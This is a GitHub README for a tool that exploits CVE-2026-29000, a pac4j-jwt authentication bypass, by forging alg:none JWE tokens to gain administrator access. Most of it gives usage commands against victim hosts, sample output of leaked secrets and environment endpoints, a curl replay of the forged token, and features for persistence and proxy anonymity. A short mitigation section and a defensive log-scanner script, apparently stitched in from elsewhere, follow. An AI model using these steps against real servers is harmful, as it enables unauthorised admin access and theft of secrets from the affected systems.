tc4dy/CVE-2026-29000-PoC-Exploit
GitHub: tc4dy/CVE-2026-29000-PoC-Exploit
A one-click PoC exploit tool for the pac4j-jwt authentication bypass vulnerability CVE-2026-29000: it extracts the server's public key and forges a JWE token to obtain administrator privileges and leak sensitive information.
Stars: 0 | Forks: 0
# 🚀 CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit
## 📌 Overview
This exploit weaponizes **CVE-2026-29000**, a critical CVSS 10.0 vulnerability in the **pac4j-jwt** library. By extracting the server's public JWKS key and forging an encrypted JWE token that carries `alg: none`, it achieves a full authentication bypass and grants complete administrator privileges in one click.
### 🔥 Key Features
- ✅ **No Authentication Required** - Pre-auth exploit, no valid credentials needed
- ✅ **Automatic JWKS Discovery** - Scans 15+ endpoints, custom paths supported
- ✅ **RSA Key Extraction** - Fetches the public key and converts JWK to PEM on the fly
- ✅ **JWT + JWE Forging** - Creates an `alg:none` JWT and wraps it using the server's own public key
- ✅ **Full Admin Token** - ROLE_ADMIN, admin:true, configurable expiry
- ✅ **Authentication Bypass** - Automatically tests 8+ protected endpoints
- ✅ **Smart Information Leak** - Enumerates 20+ sensitive API paths
- ✅ **Session Persistence** - Keep-alive thread maintains access
- ✅ **Proxy Support** - HTTP/HTTPS proxies for anonymity
- ✅ **File Export** - Saves the forged token and leaked data to files
- ✅ **Retry Mechanism** - Configurable retries for unstable connections
- ✅ **Colored Output** - Professional stage-based visual feedback
- ✅ **Verbose Mode** - Debug logging for troubleshooting
- ✅ **No Hard-Coded Delays** - Only retry backoff and keep-alive pings
## 🎯 Affected Versions
| Library | Affected Versions | Fixed Version |
|---------|-------------------|---------------|
| pac4j-jwt | < 5.1.5 | ≥ 5.1.5 |
| pac4j-jwt | 4.x < 4.5.8 | ≥ 4.5.8 |
| pac4j-jwt | 3.x < 3.18.6 | ≥ 3.18.6 |
## 📦 Installation
```bash
git clone https://github.com/yourusername/CVE-2026-29000-Exploit.git
cd CVE-2026-29000-Exploit
pip install -r requirements.txt
python exploit.py --help
```
requirements.txt:
```text
requests>=2.31.0
urllib3>=2.0.0
pyjwt>=2.8.0
cryptography>=41.0.0
jwcrypto>=1.5.0
colorama>=0.4.6
```
## 🚀 Usage
### Basic One-Shot Exploit
```bash
python exploit.py --target https://victim.com:8443
```
### Save Forged Token + Leak Data
```bash
python exploit.py -t https://target.corp:9443 -o admin.jwe -l stolen.txt
```
### Verbose Mode with Custom JWKS
```bash
python exploit.py -t https://example.com:8080 --jwks /oauth/jwks.json -v
```
### With Proxy and No Keep-Alive
```bash
python exploit.py -t https://192.168.1.100:443 --proxy http://127.0.0.1:8080 --no-keep-alive
```
### Custom Keep-Alive Interval
```bash
python exploit.py -t https://victim.com:8443 --delay 10 --max-retries 5
```
### SSL Verification Enabled
```bash
python exploit.py -t https://legit.com:8443 --ssl-verify
```
## ⚙️ Command Line Arguments
| Argument | Short | Required | Default | Description |
|----------|-------|----------|---------|-------------|
| `--target` | `-t` | Yes | - | Target URL (e.g., https://example.com:8443) |
| `--jwks` | `-k` | No | auto-detect | Custom JWKS endpoint path |
| `--output` | `-o` | No | None | Save forged JWE token to file |
| `--leak` | `-l` | No | leaked_TIMESTAMP.txt | Save leaked data to file |
| `--verbose` | `-v` | No | False | Enable debug output |
| `--proxy` | `-p` | No | None | HTTP/HTTPS proxy |
| `--user-agent` | `-ua` | No | Mozilla/5.0... | Custom User-Agent |
| `--no-keep-alive` | - | No | False | Disable session keep-alive |
| `--delay` | - | No | 5.0 | Keep-alive ping interval (seconds) |
| `--max-retries` | - | No | 3 | Max retries per failed request |
| `--ssl-verify` | - | No | False | Verify SSL certificates |
## 📸 Example Output
```text
$ python exploit.py -t https://10.10.10.100:8443 -o backdoor.jwe -l leak.txt
╔══════════════════════════════════════════════════════════════════════════════╗
║ CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit ║
║ The Professional One‑Click Admin Forge ║
║ CVSS 10.0 - CRITICAL ║
╚══════════════════════════════════════════════════════════════════════════════╝
[11:23:15] STAGE 1: Acquiring RSA public key from JWKS
[11:23:15] Probing for JWKS endpoint...
[11:23:16] Found JWKS at /realms/master/protocol/openid-connect/certs
[11:23:16] Successfully extracted RSA public key
[11:23:16] STAGE 2: Crafting JWT with alg:none & encrypting into JWE
[11:23:16] Forged JWE token (truncated): eyJhbGciOiJSU0EtT0FFUC0yNTYiLCJlbmMiOiJBMjU2R0...
[11:23:16] ✓ Token saved to backdoor.jwe
[11:23:16] STAGE 3: Sending forged JWE as Bearer token
[11:23:17] ✓ Authentication successful! Access granted to /api/users/me
[11:23:17] STAGE 4: Enumerating accessible endpoints & revealing sensitive data
[11:23:18] ✓ Leaked: /actuator/env (status 200)
[11:23:18] ✓ Leaked: /api/users (status 200)
[11:23:18] ✓ Leaked: /api/secrets (status 200)
[11:23:18] ✓ Leaked: /config/server (status 200)
[11:23:18] ✓ Captured 4 sensitive endpoints → saved to leak.txt
[11:23:18] Keep‑alive session active (Ctrl+C to stop)
[11:23:18] Token (JWE) valid for ~1 hour – reforge if expired
```
## 🧠 How It Works
```text
┌─────────────────────────────────────────────────────────────────┐
│ STAGE 1: Public Key Acquisition                                 │
│ ├── Discover JWKS endpoint (15+ known paths)                    │
│ ├── Fetch JWK containing RSA public key                         │
│ └── Convert JWK → PEM format                                    │
├─────────────────────────────────────────────────────────────────┤
│ STAGE 2: Token Forging                                          │
│ ├── Create JWT with alg: "none"                                 │
│ ├── Inject admin claims (ROLE_ADMIN, admin: true)               │
│ └── Encrypt JWT into JWE using server's public key              │
├─────────────────────────────────────────────────────────────────┤
│ STAGE 3: Authentication Bypass                                  │
│ ├── Send JWE as Bearer token                                    │
│ ├── Test 8+ protected endpoints                                 │
│ └── Extract session cookie                                      │
├─────────────────────────────────────────────────────────────────┤
│ STAGE 4: Information Exfiltration                               │
│ ├── Enumerate 20+ sensitive API paths                           │
│ ├── Collect configs, users, secrets, environment                │
│ └── Save all to leak file                                       │
├─────────────────────────────────────────────────────────────────┤
│ Keep-Alive: Ping /api/ping every N seconds                      │
└─────────────────────────────────────────────────────────────────┘
```
## 🔧 Manual Token Usage
After exploitation, use the saved JWE token with curl:
```bash
curl -H "Authorization: Bearer $(cat backdoor.jwe)" https://target.com/api/admin/users
```
## 🛡️ Detection & Mitigation
| Detection Method | Indicator |
|------------------|-----------|
| Log Analysis | JWT with `alg: none` in audit logs |
| Network Monitoring | JWKS endpoint requests from unknown IPs |
| Version Check | `curl /actuator/info \| grep pac4j` |

Mitigation:
- Update pac4j-jwt to patched versions (≥5.1.5, ≥4.5.8, ≥3.18.6)
- Disable `alg: none` support in the JWT validator
- Implement strict JWE validation
- Monitor for anomalous JWT structures
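The Log Analysis row above is the part a defender can act on directly. The following scanner is an added example, not code from this repository: it pulls bearer tokens out of constructed access-log lines and classifies each by its JOSE header, flagging a JWS with `alg: none`, a JWS or JWE using an algorithm outside an assumed allow-list (RS256 for signing, RSA-OAEP-256 for key wrapping, matching the header of the sample JWE in the output above), and marking any JWE as needing inspection of the decrypted inner JWT, since the outer header alone cannot reveal the wrapped `alg: none`.

```python
import base64
import json
import re

# Algorithms the hardened validator for this deployment accepts (assumption:
# RS256 for signed JWTs, RSA-OAEP-256 for the JWE key-wrapping layer).
ALLOWED_JWS_ALGS = {"RS256"}
ALLOWED_JWE_ALGS = {"RSA-OAEP-256"}
BEARER_RE = re.compile(r"Bearer\s+([A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]*){2,4})")

def b64url_decode(segment):
    """Decode a base64url segment, restoring the padding JOSE strips."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def classify(token):
    """Verdict for one token: alg-none, unexpected-alg, jwe-needs-inner-check, ok or malformed."""
    parts = token.split(".")  # JWS compact form has 3 segments, JWE has 5
    try:
        header = json.loads(b64url_decode(parts[0]))
    except (ValueError, UnicodeDecodeError):
        header = None
    if len(parts) not in (3, 5) or not isinstance(header, dict):
        return "malformed"
    alg = header.get("alg")
    if len(parts) == 3:
        if isinstance(alg, str) and alg.lower() == "none":
            return "alg-none"  # the unsigned JWT this CVE relies on
        return "ok" if alg in ALLOWED_JWS_ALGS else "unexpected-alg"
    # A JWE outer header says nothing about the wrapped JWT; only the server,
    # after decryption, can see whether the inner JWT carries alg: none.
    return "jwe-needs-inner-check" if alg in ALLOWED_JWE_ALGS else "unexpected-alg"

def scan_log(lines):
    """Return [(line_no, verdict)] for every bearer token in the given log lines."""
    return [(no, classify(m.group(1)))
            for no, line in enumerate(lines, 1) for m in BEARER_RE.finditer(line)]

def sample_token(header, *segments):
    """Build a compact token from a header dict plus opaque segments (constructed test data)."""
    head = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip("=")
    return ".".join((head,) + segments)

# Constructed sample access-log lines, not captured from any real system.
SAMPLE_LOG = [
    "GET /api/users/me Authorization: Bearer " + sample_token({"alg": "none", "typ": "JWT"}, "e30", ""),
    "GET /api/ping Authorization: Bearer " + sample_token({"alg": "RS256", "kid": "k1"}, "e30", "c2ln"),
    "GET /api/users Authorization: Bearer "
    + sample_token({"alg": "RSA-OAEP-256", "enc": "A256GCM"}, "aXY", "ZW5j", "Y3Q", "dGFn"),
]
```

Because the forged JWT is hidden inside the JWE, the `alg-none` verdict can only fire on logs written after the application has decrypted the token; a `jwe-needs-inner-check` verdict on an edge log is the cue to correlate with the server-side audit log.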
Tags: CISA project, CVE-2026-29000, CVSS 10.0, GHAS, Java security, JWE forgery, JWKS public key extraction, JWT security, pac4j-jwt, PoC, Python, Web security, information disclosure, protocol analysis, data display, data leakage, no backdoor, brute force, privilege escalation, red team, cybersecurity, blue team analysis, authentication bypass, reverse engineering tools, privacy protection